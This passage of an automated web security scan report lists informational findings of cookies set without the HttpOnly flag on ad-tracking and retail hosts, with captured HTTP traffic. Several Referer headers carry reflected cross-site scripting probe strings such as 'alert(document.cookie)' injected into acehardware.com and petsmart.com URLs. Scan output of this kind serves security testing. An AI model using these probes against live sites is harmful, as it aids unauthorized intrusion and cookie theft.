Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 301 Page has permanently moved
Connection: close
Date: Mon, 16 May 2011 01:54:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Location: /discussions/Fish_Discussion_Forum/fd03p00v03d1?widgetId=PTWidget4&cdsn=873&config=recentDiscussions0001&pttv=2&includeCSS=false&nav=widget
Set-Cookie: ChameleonForumId10166=2010169:fd03p00sitez; path=/
Cache-Control: private
Content-Type: text/html

13.89. http://core.bluefly.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core.bluefly.com
Path:	/cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

90039438_login=1305511372001684429890039438; path=/
90039438_reset=1305511372;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?tid=6&ci=90039438&vn2=e4.0&st=1305510900223&vn1=4.2.9-AdTarget&ec=utf-8&pi=homepage&cg=HOME&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.bluefly.com/&cvdone=p&cck= HTTP/1.1
Host: core.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; CoreID6=70191305510906213140849; TestSess3=70191305510906213140849; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90039438_login=1305511372001684429890039438; path=/
Set-Cookie: 90039438_reset=1305511372;path=/
Expires: Sun, 15 May 2011 08:02:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.90. http://customerappreciation.petco.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://customerappreciation.petco.com
Path:	/cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

90002311_reset=1305511104;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm?tid=1&ci=90002311&vn2=e4.0&st=1305510842039&vn1=4.2.9-AdTarget&ec=utf-8&pi=HOME%20PAGE&ul=http%3A//www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444&lp=HOME%20PAGE HTTP/1.1
Host: customerappreciation.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CoreID6=50181305510189266182813; TestSess3=50181305510189266182813; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; 90002311_login=1305510193015106202690002311; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; 90002311_reset=1305510204; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:24 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90002311_reset=1305511104;path=/
Expires: Sun, 15 May 2011 07:58:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

13.91. http://dis.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uic=*1Tomxq8BrFqEZpOQ1bYZp%2fBO4dZgo%2b527C6zdnJIE1IWT1EPmKzBQb4n5pBlPC%2fT%2fB3YzVvHSJbrylzlwjU6Iy9ny1g89DtKdShGo4u19iVt5FU670PqdTOIyNxrGJItJ; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
udi=*1yi90rI1ylE1uj7gpL89Aeg%3d%3d; domain=.criteo.com; expires=Tue, 17-May-2011 02:01:31 GMT; path=/
dis=*1jiNeCk4kGIZ9mu6mPVBINFP44jJN2GwOkV4%2f%2ft9P33QKlB82NkB5zNkzE%2bekrFzM8SSGQa6U2CckAyo3mINtneKAVrvoC%2fboyA5mZpGi41ULSg0gVtk0sRCj6W62P3adaTaqypakl79Ry4nKG5uVqUR9F4AYF9WxfRJbZkS2EIVE2W209%2bPDJPrRWr33FkzHwAotwKaHsjDezbx9FPSVVVyUxz16CXz0T%2fKisSwO7BSGDea496TpUYJfHwtWUIX4OiCA0EkiWo66M7dH4pxYg05Gfyn87OaKvkdXer5hgIUx5EOBCA%2bQCmaHCTx7rJwUqtwkEryIcS8GT782Xww7sDg6zIRkRFJrSTemCS6u%2fKqr%2fpxT0arnV3oClxANx0CyRh1ULL3qPB0ZaONp2JBfF3Do4BJgpUHQJ5DTaOCWFHHqlxMwZpRlU2rL9zOyEzLY; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.92. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s35783476170925 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gsicace.112.2o7.net
Path:	/b/ss/gsicace/1/H.20.3/s35783476170925

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E8825485158956-6000016F80001DC7[CE]; Expires=Sat, 14 May 2016 11:04:09 GMT; Domain=gsicace.112.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/gsicace/1/H.20.3/s35783476170925?AQB=1&ndh=1&t=16/4/2011%206%3A4%3A7%201%20300&vmt=2932E0&ns=gsicace&pageName=Category%3A%202568444%3A%20Lawn%20%26%20Garden&g=http%3A//www.acehardware.com/category/index.jsp%3FcategoryId%3D2568444%26clickid%3Dtopnav_lawn63471--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ef5bbaf27fb7&r=http%3A//burp/show/15&ch=Lawn%20%26%20Garden&server=www.acehardware.com&c2=Category%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Category%3A%202568444%3A%20Lawn%20%26%20Garden&v22=New&v24=7%3A00AM&v25=Monday&v26=Weekday&c32=Category%3A%20Lawn%20%26%20Garden&c34=Category%3A%202568444%3A%20Lawn%20%26%20Garden&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: gsicace.112.2o7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/category/index.jsp?categoryId=2568444&clickid=topnav_lawn63471--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef5bbaf27fb7
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DCBEC0F[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 11:04:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E8825485158956-6000016F80001DC7[CE]; Expires=Sat, 14 May 2016 11:04:09 GMT; Domain=gsicace.112.2o7.net; Path=/
Location: http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s35783476170925?AQB=1&pccr=true&vidn=26E8825485158956-6000016F80001DC7&&ndh=1&t=16/4/2011%206%3A4%3A7%201%20300&vmt=2932E0&ns=gsicace&pageName=Category%3A%202568444%3A%20Lawn%20%26%20Garden&g=http%3A//www.acehardware.com/category/index.jsp%3FcategoryId%3D2568444%26clickid%3Dtopnav_lawn63471--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ef5bbaf27fb7&r=http%3A//burp/show/15&ch=Lawn%20%26%20Garden&server=www.acehardware.com&c2=Category%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Category%3A%202568444%3A%20Lawn%20%26%20Garden&v22=New&v24=7%3A00AM&v25=Monday&v26=Weekday&c32=Category%3A%20Lawn%20%26%20Garden&c34=Category%3A%202568444%3A%20Lawn%20%26%20Garden&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 11:04:09 GMT
Last-Modified: Tue, 17 May 2011 11:04:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www324
Content-Length: 0
Content-Type: text/plain

13.93. http://hire.jobvite.com/CompanyJobs/Careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

guestidc=5ca2bcbf-4c16-4cf2-b0d2-57e62d1c65f1; expires=Wed, 15-Jun-2011 10:22:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

13.94. http://html.aggregateknowledge.com/iframe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://html.aggregateknowledge.com
Path:	/iframe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uuid=801458892474636324; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sat, 14-May-2016 01:58:28 GMT; Path=/
u=5|0AQBbQRYAAAAAAQEAAQEAgA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Wed, 15-May-2013 01:58:28 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.95. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271; domain=.interclick.com; expires=Sun, 16-May-2021 02:01:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.96. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837; domain=pubmatic.com; expires=Thu, 15-May-2014 01:53:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.97. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://includes.petsmart.com
Path:	/homepage/redesigned/images/logo-facebook.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=JOLQUPS172.16.96.228CKMYW; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/redesigned/images/logo-facebook.gif HTTP/1.1
Host: includes.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=JOLQUPS172.16.96.228CKMYW; path=/
Date: Mon, 16 May 2011 10:49:56 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:11:50 GMT
ETag: "f28003-78-4662104f59580"
Accept-Ranges: bytes
Content-Length: 120
Content-Type: image/gif

GIF89a.......;Y....m.....ay.Eb.`x....!.......,..........=x.....I.$.j...A0u......\....."@R...o..>..XQ.... .,..I&.y..(...;

13.98. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://includes.petsmart.com
Path:	/homepage/redesigned/images/logo-twitter.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=JOLQUPS172.16.96.228CKMYW; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/redesigned/images/logo-twitter.gif HTTP/1.1
Host: includes.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=JOLQUPS172.16.96.228CKMYW; path=/
Date: Mon, 16 May 2011 10:49:56 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:02:41 GMT
ETag: "f28004-175-46620e43c8240"
Accept-Ranges: bytes
Content-Length: 373
Content-Type: image/gif

GIF89a.....$..........|........d..t.......................<.....l........$....................T........D..L...........\.................................................................................
...[SNIP]...

13.99. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=h9P0NJpwHg02FkwBdbdBJcgohXQCbaICPfgBwB; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/
GUID=MTMwNTU0MjQ5NzsxOjE2c2txbW0wbDE1dnAxOjM2NQ; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.100. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=173.193.214.243.1305543854697238; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2134&dtm_cmagic=fca078&dtm_format=5&cli_promo_id=2&dtm_user_id=&dtmc_cat=Lawn%20%26%20Garden&dtmc_catid=2568444&dtmc_subcat=&dtmc_subcatid=&dtmc_prodid=4252238&dtmc_prod_img=http%3A//ACE.imageg.net/graphics/product_images/pACE3-8013737th.jpg&dtmc_zip=&dtmc_ref=http%3A//burp/show/15 HTTP/1.1
Host: login.dotomi.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/category/index.jsp?categoryId=2568444&clickid=topnav_lawn63471--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef5bbaf27fb7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:04:14 GMT
X-Name: dmc-o02
Set-Cookie: Apache=173.193.214.243.1305543854697238; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Content-Type: text/html
Content-Length: 191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>

</body>
</html>

13.101. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pluto2=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
lyc=AQAAAAEAAKAAAFCgByAAA+o2AAA=; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
pluto=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.102. http://media.gnc.com/ipixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gnc.com
Path:	/ipixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PrefID=41-1015464695; expires=Wed, 15 May 2013 13:58:34 GMT; path=/; domain=.gnc.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.103. http://media.gsimedia.net/ipixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gsimedia.net
Path:	/ipixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PrefID=22-662078189; expires=Wed, 15 May 2013 13:56:27 GMT; path=/; domain=.gsimedia.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.104. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.brookstone.com
Path:	/b/ss/bstoneprod/1/H.21/s01194140000734

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E842E7051D1631-40000143C001ABA1[CE]; Expires=Sat, 14 May 2016 02:02:54 GMT; Domain=.brookstone.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.105. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.gnc.com
Path:	/b/ss/gsicgncf/1/H.20.3/s35472931402100

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E8810485163B23-40000183E0155674[CE]; Expires=Sat, 14 May 2016 10:52:57 GMT; Domain=.gnc.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.106. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.petsmart.com
Path:	/b/ss/gsicpet/1/H.20.3/s38054509394851

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E880B4050116FC-60000108C015DA82[CE]; Expires=Sat, 14 May 2016 10:50:16 GMT; Domain=.petsmart.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.107. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://o.toshibadirect.com
Path:	/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E87FB0051D141D-4000013200014B2A[CE]; Expires=Sat, 14 May 2016 10:41:36 GMT; Domain=.toshibadirect.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.108. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.109. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.110. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.111. http://phoenix.untd.com/TRCK/RGST previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://phoenix.untd.com
Path:	/TRCK/RGST

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WHRE=1855A_1:125DC3_0_1882A; expires=Thu, 13 May 2021 02:01:49 GMT; domain=.untd.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.112. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D05509/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNfEOh7gMUVmN+rJTfuGJ3lJ2WIlmH+K4lNWvB9xCh8we5B/vOPodlGvFGW0Z4wA55MvPQcWymIH2JcYlrOwkYsTo9uVScK0Ua4baBot2CPh5UPtUBFRfDxV2qCUT9ijeVsXo0496NoZxE+VT03J2BBs/L705ahQTDFMb9AsF0RDzzS9OyuyEnNSh05TjP5dAXiU0xJ68BrtFi/ZBkUn4jVTkybTRgbgbR9JGbWMf5UNUl8uA=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
rtc_okMd=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; Domain=.revsci.net; Expires=Tue, 15-May-2012 02:02:15 GMT; Path=/
NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56fa7&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 13-Jun-2011 02:02:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.113. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cmp=1_1305510847_11939:0_5512:45459; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:54:07 GMT; Path=/
